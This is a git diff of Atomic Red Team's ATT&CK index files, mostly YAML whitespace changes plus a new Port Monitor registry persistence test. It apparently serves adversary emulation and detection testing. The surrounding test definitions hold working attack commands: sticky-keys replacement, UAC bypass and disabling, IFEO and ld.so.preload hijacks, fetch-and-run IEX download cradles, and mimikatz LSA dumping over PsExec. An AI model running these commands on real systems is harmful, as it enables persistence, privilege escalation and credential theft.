(Windows)](../../T1037.001/T1037.001.md) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Window](../../T1564.003/T1564.003.md) | | | | | | | | | | | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Hide Artifacts](../../T1564/T1564.md) | | | | | | | | | | | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Plist Modification](../../T1547.011/T1547.011.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [Office Application Startup](../../T1137/T1137.md) | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Impair Command History Logging](../../T1562.003/T1562.003.md) | | | | | | | | +| | | [Office Application Startup](../../T1137/T1137.md) | [Port Monitors](../../T1547.010/T1547.010.md) | [Impair Command History Logging](../../T1562.003/T1562.003.md) | | | | | | | | | | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | [Office Test](../../T1137.002/T1137.002.md) | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | | | | | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | @@ -68,7 +68,7 @@ | | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Rc.common](../../T1037.004/T1037.004.md) | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | [Plist Modification](../../T1547.011/T1547.011.md) | [Re-opened Applications](../../T1547.007/T1547.007.md) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | | | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | | | -| | | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Accounts](../../T1078.003/T1078.003.md) | | | | | | | | +| | | [Port Monitors](../../T1547.010/T1547.010.md) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Accounts](../../T1078.003/T1078.003.md) | | | | | | | | | | | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Scheduled Task](../../T1053.005/T1053.005.md) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | | | | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screensaver](../../T1546.002/T1546.002.md) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | | diff --git a/atomics/Indexes/Matrices/windows-matrix.md b/atomics/Indexes/Matrices/windows-matrix.md index a1d32297b9..843aac230f 100644 --- a/atomics/Indexes/Matrices/windows-matrix.md +++ b/atomics/Indexes/Matrices/windows-matrix.md @@ -41,7 +41,7 @@ | | | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Office Application Startup](../../T1137/T1137.md) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Window](../../T1564.003/T1564.003.md) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | | | | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Hide Artifacts](../../T1564/T1564.md) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | [Office Test](../../T1137.002/T1137.002.md) | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Office Test](../../T1137.002/T1137.002.md) | [Port Monitors](../../T1547.010/T1547.010.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Impair Command History Logging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | [Outlook Home Page](../../T1137.004/T1137.004.md) | [PowerShell Profile](../../T1546.013/T1546.013.md) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | @@ -50,7 +50,7 @@ | | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Injection](../../T1055/T1055.md) | [Indirect Command Execution](../../T1202/T1202.md) | | | | | | | | | | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [InstallUtil](../../T1218.004/T1218.004.md) | | | | | | | | -| | | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Port Monitors](../../T1547.010/T1547.010.md) | [Scheduled Task](../../T1053.005/T1053.005.md) | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | [PowerShell Profile](../../T1546.013/T1546.013.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Accounts](../../T1078.003/T1078.003.md) | | | | | | | | | | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screensaver](../../T1546.002/T1546.002.md) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | | | | | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 32265a4351..0a426fe775 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -55,7 +55,7 @@ privilege-escalation: auto_generated_guid: 94500ae1-7e31-47e3-886b-c328da46872f description: 'Adds a command to the .bash_profile file of the current user -' + ' supported_platforms: - macos - linux @@ -67,13 +67,13 @@ privilege-escalation: executor: command: 'echo "#{command_to_add}" >> ~/.bash_profile -' + ' name: sh - name: Add command to .bashrc auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f description: 'Adds a command to the .bashrc file of the current user -' + ' supported_platforms: - macos - linux @@ -85,7 +85,7 @@ privilege-escalation: executor: command: 'echo "#{command_to_add}" >> ~/.bashrc -' + ' name: sh T1548: technique: @@ -325,7 +325,7 @@ privilege-escalation: description: 'Comma separated list of system binaries to which you want to attach each #{attached_process}. Default: "osk.exe" -' + ' type: String default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe @@ -333,7 +333,7 @@ privilege-escalation: description: 'Full path to process to attach to target in #{parent_list}. Default: cmd.exe -' + ' type: Path default: C:\windows\system32\cmd.exe executor: @@ -367,7 +367,7 @@ privilege-escalation: auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3 description: 'Replace sticky keys binary (sethc.exe) with cmd.exe -' + ' supported_platforms: - windows executor: @@ -378,7 +378,7 @@ privilege-escalation: copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe cleanup_command: 'copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe -' + ' name: command_prompt elevation_required: true T1546.009: @@ -564,11 +564,11 @@ privilege-escalation: - description: 'Reg files must exist on disk at specified locations (#{registry_file} and #{registry_cleanup_file}) -' + ' prereq_command: 'if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file})) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory (split-path #{registry_file}) -ErrorAction ignore | Out-Null @@ -577,11 +577,11 @@ privilege-escalation: - description: 'DLL''s must exist in the C:\Tools directory (T1546.010.dll and T1546.010x86.dll) -' + ' prereq_command: 'if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll)) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory C:\Tools -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll" -OutFile C:\Tools\T1546.010.dll @@ -589,10 +589,10 @@ privilege-escalation: executor: command: 'reg.exe import #{registry_file} -' + ' cleanup_command: 'reg.exe import #{registry_cleanup_file} >nul 2>&1 -' + ' name: command_prompt elevation_required: true T1546.011: @@ -698,31 +698,31 @@ privilege-escalation: - description: 'Shim database file must exist on disk at specified location (#{file_path}) -' + ' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicShimx86.sdb" -OutFile "#{file_path}" - description: 'AtomicTest.dll must exist at c:\Tools\AtomicTest.dll -' + ' prereq_command: 'if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path c:\Tools\AtomicTest.dll) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicTest.dll" -OutFile c:\Tools\AtomicTest.dll executor: command: 'sdbinst.exe #{file_path} -' + ' cleanup_command: 'sdbinst.exe -u #{file_path} >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: New shim database files created in the default shim database directory @@ -919,7 +919,7 @@ privilege-escalation: description: 'This test submits a command to be run in the future by the `at` daemon. -' + ' supported_platforms: - linux input_arguments: @@ -935,30 +935,30 @@ privilege-escalation: dependencies: - description: 'The `at` and `atd` executables must exist in the PATH -' + ' prereq_command: 'which at && which atd -' + ' get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found in the PATH (Package name: `at`)'' -' + ' - description: 'The `atd` daemon must be running -' + ' prereq_command: 'systemctl status atd || service atd status -' + ' get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service atd start` ; systemd: `systemctl start atd`)'' -' + ' executor: name: sh elevation_required: false command: 'echo "#{at_command}" | at #{time_spec} -' + ' T1053.002: technique: external_references: @@ -1055,7 +1055,7 @@ privilege-escalation: elevation_required: false command: 'at 13:20 /interactive cmd -' + ' T1547.002: technique: id: attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec @@ -1349,7 +1349,7 @@ privilege-escalation: cmd.exe /c eventvwr.msc cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1 -' + ' name: command_prompt - name: Bypass UAC using Event Viewer (PowerShell) auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b @@ -1371,7 +1371,7 @@ privilege-escalation: cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse -ErrorAction Ignore -' + ' name: powershell - name: Bypass UAC using Fodhelper auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182 @@ -1393,7 +1393,7 @@ privilege-escalation: cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f >nul 2>&1 -' + ' name: command_prompt - name: Bypass UAC using Fodhelper - PowerShell auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa @@ -1416,7 +1416,7 @@ privilege-escalation: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore -' + ' name: powershell - name: Bypass UAC using ComputerDefaults (PowerShell) auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f @@ -1439,7 +1439,7 @@ privilege-escalation: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Bypass UAC by Mocking Trusted Directories @@ -1487,7 +1487,7 @@ privilege-escalation: cleanup_command: 'Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse -Force -ErrorAction Ignore -' + ' name: powershell - name: Disable UAC using reg.exe auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 @@ -1500,11 +1500,11 @@ privilege-escalation: command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f -' + ' cleanup_command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f -' + ' name: command_prompt elevation_required: true T1574.012: @@ -1616,7 +1616,7 @@ privilege-escalation: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -1661,7 +1661,7 @@ privilege-escalation: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -1699,7 +1699,7 @@ privilege-escalation: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -1816,10 +1816,10 @@ privilege-escalation: executor: command: 'assoc #{extension_to_change}=#{target_extension_handler} -' + ' cleanup_command: 'assoc #{extension_to_change}=#{original_extension_handler} -' + ' name: command_prompt elevation_required: true T1078.004: @@ -2131,7 +2131,7 @@ privilege-escalation: of the referenced file. This technique was used by numerous IoT automated exploitation attacks. -' + ' supported_platforms: - macos - linux @@ -2151,7 +2151,7 @@ privilege-escalation: echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} cleanup_command: 'crontab /tmp/notevil -' + ' - name: Cron - Add script to all cron subfolders auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily, @@ -2159,7 +2159,7 @@ privilege-escalation: schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. -' + ' supported_platforms: - macos - linux @@ -2191,7 +2191,7 @@ privilege-escalation: to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. -' + ' supported_platforms: - linux input_arguments: @@ -2208,10 +2208,10 @@ privilege-escalation: name: bash command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} -' + ' cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} -' + ' T1574.001: technique: created: '2020-03-13T18:11:08.357Z' @@ -2384,10 +2384,10 @@ privilege-escalation: dependencies: - description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable}) -' + ' prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}" @@ -2395,7 +2395,7 @@ privilege-escalation: command: "#{gup_executable}\n" cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 -' + ' name: command_prompt T1078.001: technique: @@ -2696,10 +2696,10 @@ privilege-escalation: dependencies: - description: 'Utility to inject must exist on disk at specified location (#{dll_payload}) -' + ' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll" -OutFile "#{dll_payload}" @@ -2843,7 +2843,7 @@ privilege-escalation: description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor) daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124 -' + ' supported_platforms: - macos input_arguments: @@ -3389,7 +3389,7 @@ privilege-escalation: auto_generated_guid: fdda2626-5234-4c90-b163-60849a24c0b8 description: 'Leverage Global Flags Settings -' + ' supported_platforms: - windows input_arguments: @@ -3405,19 +3405,19 @@ privilege-escalation: command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}" -' + ' cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: IFEO Global Flags auto_generated_guid: 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 description: 'Leverage Global Flags Settings -' + ' supported_platforms: - windows input_arguments: @@ -3547,7 +3547,7 @@ privilege-escalation: description: 'This test uses the insmod command to load a kernel module for Linux. -' + ' supported_platforms: - linux input_arguments: @@ -3571,10 +3571,10 @@ privilege-escalation: dependencies: - description: 'The kernel module must exist on disk at specified location -' + ' prereq_command: 'if [ -f #{module_path} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: | if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi; cp #{module_source_path}/* #{temp_folder}/ @@ -3583,7 +3583,7 @@ privilege-escalation: executor: command: 'sudo insmod #{module_path} -' + ' cleanup_command: | sudo rmmod #{module_name} [ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder} @@ -3727,21 +3727,21 @@ privilege-escalation: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) -' + ' prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} -' + ' executor: command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload'' -' + ' cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload -' + ' name: bash elevation_required: true - name: Shared Library Injection via LD_PRELOAD @@ -3766,18 +3766,18 @@ privilege-escalation: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) -' + ' prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} -' + ' executor: command: 'LD_PRELOAD=#{path_to_shared_library} ls -' + ' name: bash T1547.008: technique: @@ -3928,7 +3928,7 @@ privilege-escalation: auto_generated_guid: a5983dee-bf6c-4eaf-951c-dbc1a7b90900 description: 'Create a plist and execute it -' + ' supported_platforms: - macos input_arguments: @@ -3945,15 +3945,15 @@ privilege-escalation: - description: 'The shared library must exist on disk at specified location (#{path_malicious_plist}) -' + ' prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "The shared library doesn''t exist. Check the path"; exit 1; -' + ' executor: name: bash elevation_required: true @@ -4042,7 +4042,7 @@ privilege-escalation: auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf description: 'Utilize LaunchDaemon to launch `Hello World` -' + ' supported_platforms: - macos input_arguments: @@ -4059,15 +4059,15 @@ privilege-escalation: - description: 'The shared library must exist on disk at specified location (#{path_malicious_plist}) -' + ' prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and try again."; exit 1; -' + ' executor: name: bash elevation_required: true @@ -4282,7 +4282,7 @@ privilege-escalation: auto_generated_guid: f047c7de-a2d9-406e-a62b-12a09d9516f4 description: 'Mac logon script -' + ' supported_platforms: - macos executor: @@ -4481,7 +4481,7 @@ privilege-escalation: description: 'Netsh interacts with other operating system components using dynamic-link library (DLL) files -' + ' supported_platforms: - windows input_arguments: @@ -4492,7 +4492,7 @@ privilege-escalation: executor: command: 'netsh.exe add helper #{helper_file} -' + ' name: command_prompt T1037.003: technique: @@ -4651,10 +4651,10 @@ privilege-escalation: dependencies: - description: 'DLL to inject must exist on disk at specified location (#{dll_path}) -' + ' prereq_command: 'if (Test-Path #{dll_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}" @@ -4695,7 +4695,7 @@ privilege-escalation: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine ''#{command_line}'' -ParentId #{parent_pid}' @@ -4724,7 +4724,7 @@ privilege-escalation: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid #{test_guid}' @@ -4754,7 +4754,7 @@ privilege-escalation: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, ProcessId -Filter "Name = ''svchost.exe'' AND CommandLine LIKE ''%''" | @@ -4790,7 +4790,7 @@ privilege-escalation: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine ''#{command_line}''' @@ -5200,7 +5200,7 @@ privilege-escalation: auto_generated_guid: 394a538e-09bb-4a4a-95d1-b93cf12682a8 description: 'Modify MacOS plist file in one of two directories -' + ' supported_platforms: - macos executor: @@ -5283,7 +5283,31 @@ privilege-escalation: - Travis Smith, Tripwire x_mitre_platforms: - Windows - atomic_tests: [] + identifier: T1547.010 + atomic_tests: + - name: Add Port Monitor persistence in Registry + auto_generated_guid: d34ef297-f178-4462-871e-9ce618d44e50 + description: Add key-value pair to a Windows Port Monitor registry. On the subsequent + reboot dll will be execute under spoolsv with NT AUTHORITY/SYSTEM privilege. + supported_platforms: + - windows + input_arguments: + monitor_dll: + description: Addition to port monitor registry key. Normally refers to a + DLL name in C:\Windows\System32. arbitrary DLL can be loaded if permissions + allow writing a fully-qualified pathname for that DLL. + type: Path + default: C:\Path\AtomicRedTeam.dll + executor: + command: 'reg add "hklm\system\currentcontrolset\control\print\monitors\ART" + /v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ + + ' + cleanup_command: 'reg delete "hklm\system\currentcontrolset\control\print\monitors\ART" + + ' + name: command_prompt + elevation_required: true T1055.002: technique: external_references: @@ -5429,7 +5453,7 @@ privilege-escalation: profile pofile that points to a malicious executable. Upon execution, calc.exe will be launched. -' + ' supported_platforms: - windows input_arguments: @@ -5445,13 +5469,13 @@ privilege-escalation: dependencies: - description: 'Ensure a powershell profile exists for the current user -' + ' prereq_command: 'if (Test-Path #{ps_profile}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'New-Item -Path #{ps_profile} -Type File -Force -' + ' executor: command: | Add-Content #{ps_profile} -Value "" @@ -5800,13 +5824,13 @@ privilege-escalation: cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore -' + ' name: powershell - name: RunPE via VBA auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b description: 'This module executes calc.exe from within the WINWORD.EXE process -' + ' supported_platforms: - windows input_arguments: @@ -5818,7 +5842,7 @@ privilege-escalation: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -5829,7 +5853,7 @@ privilege-escalation: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1055.012\\src\\T1055.012-macrocode.txt\" @@ -5951,7 +5975,7 @@ privilege-escalation: dependencies: - description: 'The 64-bit version of Microsoft Office must be installed -' + ' prereq_command: | try { $wdApp = New-Object -COMObject "Word.Application" @@ -5962,7 +5986,7 @@ privilege-escalation: get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement" -' + ' executor: command: | IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) @@ -5995,7 +6019,7 @@ privilege-escalation: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) -' + ' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -6008,10 +6032,10 @@ privilege-escalation: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path}) -' + ' prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force @@ -6021,7 +6045,7 @@ privilege-escalation: command: '#{psexec_path} /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa /inject /id:500" "exit" -' + ' name: command_prompt elevation_required: false T1055.008: @@ -6168,7 +6192,7 @@ privilege-escalation: command: 'sudo echo osascript -e ''tell app "Finder" to display dialog "Hello World"'' >> /etc/rc.common -' + ' elevation_required: true name: bash T1547.007: @@ -6251,10 +6275,10 @@ privilege-escalation: executor: command: 'sudo defaults write com.apple.loginwindow LoginHook #{script} -' + ' cleanup: 'sudo defaults delete com.apple.loginwindow LoginHook -' + ' elevation_required: true name: sh T1547.001: @@ -6377,11 +6401,11 @@ privilege-escalation: command: 'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}" -' + ' cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f >nul 2>&1 -' + ' name: command_prompt - name: Reg Key RunOnce auto_generated_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb @@ -6399,11 +6423,11 @@ privilege-escalation: command: 'REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}" -' + ' cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: PowerShell Registry RunOnce @@ -6429,7 +6453,7 @@ privilege-escalation: cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Suspicious vbs file run from startup Folder @@ -6670,7 +6694,7 @@ privilege-escalation: description: 'Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. -' + ' supported_platforms: 